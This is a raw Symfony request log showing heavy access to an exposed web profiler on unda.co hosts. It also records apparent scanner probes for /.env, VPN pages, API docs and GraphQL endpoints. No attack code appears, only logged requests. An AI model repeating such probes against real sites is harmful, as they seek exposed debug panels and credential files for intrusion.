[2025-12-18 11:08:24] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"0397c8","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/0397c8?panel=twig","method":"GET"} []
[2025-12-18 11:08:24] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
[2025-12-18 11:18:36] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
[2025-12-18 11:21:55] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 11:21:58] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"POST"} []
[2025-12-18 11:22:01] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
[2025-12-18 11:22:02] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
[2025-12-18 11:22:17] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"5b9b7e","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/5b9b7e?panel=time","method":"GET"} []
[2025-12-18 11:22:17] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=time","method":"GET"} []
[2025-12-18 11:33:57] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"b03555","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/b03555?panel=twig","method":"GET"} []
[2025-12-18 11:33:57] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
[2025-12-18 11:44:11] request.INFO: Matched route "_profiler_open_file". {"route":"_profiler_open_file","route_parameters":{"_controller":"web_profiler.controller.profiler:openAction","_route":"_profiler_open_file"},"request_uri":"https://unda.co/_profiler/open?file=vendor%2Fsymfony%2Fsymfony%2Fsrc%2FSymfony%2FComponent%2FSecurity%2FCore%2FAuthorization%2FVoter%2FAuthenticatedVoter.php&line=26","method":"GET"} []
[2025-12-18 11:44:29] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"0397c8","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/0397c8?panel=cache","method":"GET"} []
[2025-12-18 11:44:29] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
[2025-12-18 11:44:40] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"b03555","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/b03555?panel=time","method":"GET"} []
[2025-12-18 11:44:40] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=time","method":"GET"} []
[2025-12-18 11:48:46] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
[2025-12-18 11:54:25] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"b03555","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/b03555?panel=security","method":"GET"} []
[2025-12-18 11:54:25] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=security","method":"GET"} []
[2025-12-18 11:56:22] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 12:03:37] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"b03555","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/b03555?panel=request","method":"GET"} []
[2025-12-18 12:03:37] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=request","method":"GET"} []
[2025-12-18 12:05:30] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"0409e5","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/0409e5?panel=request","method":"GET"} []
[2025-12-18 12:05:30] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=request","method":"GET"} []
[2025-12-18 12:06:45] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"0397c8","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/0397c8?panel=validator","method":"GET"} []
[2025-12-18 12:06:45] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=validator","method":"GET"} []
[2025-12-18 12:13:15] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"b03555","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/b03555?panel=config","method":"GET"} []
[2025-12-18 12:13:15] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=config","method":"GET"} []
[2025-12-18 12:15:12] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"5e3cf1","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/5e3cf1?panel=cache","method":"GET"} []
[2025-12-18 12:15:12] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
[2025-12-18 12:18:34] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"f6e651","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/f6e651?panel=db","method":"GET"} []
[2025-12-18 12:18:34] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=db","method":"GET"} []
[2025-12-18 12:20:54] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
[2025-12-18 12:22:50] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"8cbb1b","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/8cbb1b?panel=time","method":"GET"} []
[2025-12-18 12:22:50] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=time","method":"GET"} []
[2025-12-18 12:23:05] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /service/api-docs/"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /service/api-docs/\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 12:23:09] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"8098e0","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/8098e0?panel=request","method":"GET"} []
[2025-12-18 12:23:09] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=request","method":"GET"} []
[2025-12-18 12:24:23] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
[2025-12-18 12:24:24] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
[2025-12-18 12:24:37] request.INFO: Matched route "_wdt". {"route":"_wdt","route_parameters":{"_controller":"web_profiler.controller.profiler:toolbarAction","token":"0a3cf4","_route":"_wdt"},"request_uri":"https://web.unda.co/_wdt/0a3cf4","method":"GET"} []
[2025-12-18 12:26:17] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"OPTIONS"} []
[2025-12-18 12:32:12] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"8cbb1b","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/8cbb1b?panel=security","method":"GET"} []
[2025-12-18 12:32:12] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=security","method":"GET"} []
[2025-12-18 12:32:52] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"1e9f0c","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/1e9f0c","method":"GET"} []
[2025-12-18 12:32:52] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-18 12:32:59] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"0397c8","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/0397c8?panel=router","method":"GET"} []
[2025-12-18 12:32:59] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=router","method":"GET"} []
[2025-12-18 12:32:59] request.INFO: Matched route "_profiler_router". {"route":"_profiler_router","route_parameters":{"_controller":"web_profiler.controller.router:panelAction","token":"0397c8","_route":"_profiler_router"},"request_uri":"https://www.unda.co/_profiler/0397c8/router","method":"GET"} []
[2025-12-18 12:38:31] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/","method":"GET"} []
[2025-12-18 12:40:01] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/latest?ip=47.242.70.104&limit=10","method":"GET"} []
[2025-12-18 12:40:01] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=47.242.70.104&limit=10","method":"GET"} []
[2025-12-18 12:42:05] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"8cbb1b","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/8cbb1b?panel=request","method":"GET"} []
[2025-12-18 12:42:05] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=request","method":"GET"} []
[2025-12-18 12:42:47] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"273b59","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/273b59?panel=twig","method":"GET"} []
[2025-12-18 12:42:47] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
[2025-12-18 12:44:42] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/latest?ip=199.45.154.156&limit=10","method":"GET"} []
[2025-12-18 12:44:42] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=199.45.154.156&limit=10","method":"GET"} []
[2025-12-18 12:45:57] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"822e44","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/822e44?panel=security","method":"GET"} []
[2025-12-18 12:45:57] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=security","method":"GET"} []
[2025-12-18 12:47:21] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"4f4271","_route":"_profiler_search_results"},"request_uri":"https://web.unda.co/_profiler/4f4271/search/results?ip=189.172.56.183&limit=10&method=POST","method":"GET"} []
[2025-12-18 12:47:21] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?ip=189.172.56.183&limit=10&method=POST","method":"GET"} []
[2025-12-18 12:50:19] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /vpn/index.html"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /vpn/index.html\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 12:50:56] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"8cbb1b","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/8cbb1b?panel=config","method":"GET"} []
[2025-12-18 12:50:56] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=config","method":"GET"} []
[2025-12-18 12:52:23] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"69c165","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/69c165","method":"GET"} []
[2025-12-18 12:52:23] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-18 12:54:14] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"c601b4","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/c601b4?panel=logger","method":"GET"} []
[2025-12-18 12:54:14] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=logger","method":"GET"} []
[2025-12-18 12:59:52] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"8cbb1b","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/8cbb1b?panel=cache","method":"GET"} []
[2025-12-18 12:59:52] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
[2025-12-18 13:08:51] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"8cbb1b","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/8cbb1b","method":"GET"} []
[2025-12-18 13:08:51] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-18 13:08:51] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 13:17:49] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"9b6635","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/9b6635?panel=request","method":"GET"} []
[2025-12-18 13:17:49] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=request","method":"GET"} []
[2025-12-18 13:17:56] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"b4593c","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/b4593c?panel=exception","method":"GET"} []
[2025-12-18 13:17:56] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=exception","method":"GET"} []
[2025-12-18 13:19:25] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"0e7757","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/0e7757?panel=cache","method":"GET"} []
[2025-12-18 13:19:25] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
[2025-12-18 13:25:15] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"447d8e","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/447d8e?panel=cache","method":"GET"} []
[2025-12-18 13:25:15] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
[2025-12-18 13:28:01] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"7d221d","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/7d221d","method":"GET"} []
[2025-12-18 13:28:01] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-18 13:30:39] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"0e7757","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/0e7757","method":"GET"} []
[2025-12-18 13:30:39] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-18 13:32:12] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
[2025-12-18 13:32:48] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 13:33:38] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
[2025-12-18 13:33:38] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
[2025-12-18 13:33:39] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /graphql"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /graphql\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 13:33:39] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /api"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /api\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 13:33:40] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /api/graphql"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /api/graphql\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 13:33:40] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /graphql/api"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /graphql/api\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 13:33:40] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /api/gql"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /api/gql\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
